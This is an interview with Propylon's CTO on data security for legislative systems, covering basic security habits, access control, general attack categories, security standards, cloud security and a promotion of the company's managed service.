Legislative Q&A: Cybersecurity with Greg Chapple, CTO

At the heart of every legislature is the staff ensuring its smooth running. In this Legislative Q&A series, we’re talking to legislative experts and staff about their journey to the legislature, shining a light on the working lives at the heart of American law-making. In the latest instalment, we spoke with Greg Chapple, Propylon CTO. With an increase in cyberattacks in recent years, Greg fills us in on the controls individuals and businesses can implement to ensure data is protected. As well as some playbooks and strategies to protect against attacks, we discuss the cloud and the security of cloud data. 

1. Greg, welcome to our Legislative Q&A. What are some common data security challenges? What measures can businesses implement at an individual as well as at an organizational level?

The biggest challenge I’ve encountered is maintaining a picture of where your data is, and who has access to it at any given time. This is especially challenging in document-centric systems such as legislative management systems where data is frequently represented to consumers in a very portable manner – e.g. downloadable, printable documents.
As an individual, it’s the simple things that make a big difference. When working with data that may be considered private, sensitive, or confidential – consider how others might try to gain access to that data. Being conscious of the following will go a long way to ensuring data is protected:
  • Be aware of who can see your screen when you are working. Is it possible for someone to look over your shoulder and see what you are doing?
  • If working in a public space, don’t use open WIFI networks as these can be used to intercept data without you even realizing.
  • When you walk away from your PC, lock your screen to make sure someone can’t access what you were working on when you’re not in the room.
  • Ensure you have a strong password on your PC to dissuade someone from trying to force their way into your account.
  • Periodically review what files you have stored on your PC and remove any that you don’t need immediate access to, and instead, store them in your organization’s central document management system as appropriate.
As an organization, it is important to correctly label and classify data according to its level of sensitivity, and ensure appropriate access controls are in place for each label or level. For instance, access to confidential data may be limited to those in a specific role or department, whereas access to public data can be much more open. Role-based access is a useful pattern for managing access to data and data functions according to criteria defined in relation to the underlying data classification.

2. What kind of attacks can legislative systems be vulnerable to?

Since legislative systems contain a broad range of data types and application interfaces, there are a number of scenarios here.

The two largest relevant categories are perhaps embedded content attacks and web-based attacks.
Content-based attacks involve malicious actors injecting content into documents stored in the legislative system. The injected content might be a script, a virus, or malformed content designed to cause errors in applications processing the content.

Web-based attacks include common scenarios like cross-site scripting, injection attacks, denial-of-service attacks, and more.

3. State-sponsored cyber-attacks are increasing. What do you think are the biggest future challenges?

I think the biggest challenge will be scaling your security function to a level where you can keep on top of the ever-growing and ever-changing security landscape. The list of possible attacks, the list of known vulnerabilities, only grows larger. Keeping on top of this becomes harder and harder, and unless you have the desire to invest significantly in your security function within the organization, to either build or hire the required skills and expertise at the level required to stay safe, you’ll be at risk.

4. What kind of playbooks and strategies can states implement to protect against attacks? Are there long-term and short-term solutions?

Implementing processes and tools from security standards (e.g. NIST, SOC 2, ISO 27001, etc,.) is a great long-term strategy. One of the core principles in any of those standards is to establish an ongoing security management system – it becomes part of how you do business. It takes time to implement that various policies and procedures under any of those standards, but it is well worth the investment. Short-term wins can be found in evaluating and reviewing the basics – access controls, password management, device management, etc. Take some time to review the current state of those items and clean up any anomalies.

5. Why is it important to keep systems current?

Any given system is made up of many individual components, libraries, and packages. Any of these elements can be vulnerable to attacks in a variety of ways. Keeping systems up to date means keeping all component parts up to date to ensure any attack surface within your organization is minimized as much as possible, and that your organization’s data and resources are protected.

6. Let’s talk about the cloud. How secure is cloud data? How does it work at a high level?

In many ways, cloud data is more secure than the alternatives. Modern cloud data centers are subject to massive amounts of regulation with respect to security and privacy, and cloud providers have invested millions in ensuring they are compliant – far more than any individual business could invest.

At a high level, when you provision cloud infrastructure, your cloud vendor allocates the relevant virtual infrastructure within the relevant data center(s). The virtual infrastructure is provisioned according to your specifications and should fall into your own IT management processes. The underlying hardware is managed by the cloud provider, including the data center management and security. The cloud vendor ensures the virtual infrastructure you’ve created is completely isolated from any other customer systems, meaning you have total privacy within your new cloud environment.

All cloud providers offer industry-standard encryption and security tools to help further secure your data and related systems.

7. What is a managed service and what does a managed services provider (MSP) do? What are some benefits of working with an MSP?

A managed service provider takes on the management and maintenance of a given service on behalf of a customer. MSPs can help fill staff shortages, provide expertise, provide business continuity, and improve security and cost efficiency.

The LWB 360® Managed Service is a great example of this. We offer fully managed instances of our LWB 360 software, meaning our customers can benefit from our best-in-class legislative management solutions without the burden of the management and maintenance of the underlying infrastructure. This frees up valuable legislative IT staff time to focus on supporting the legislature in the day-to-day operations and still benefit from Propylon’s expertise in managing these systems in a secure, highly available and cost-effective environment.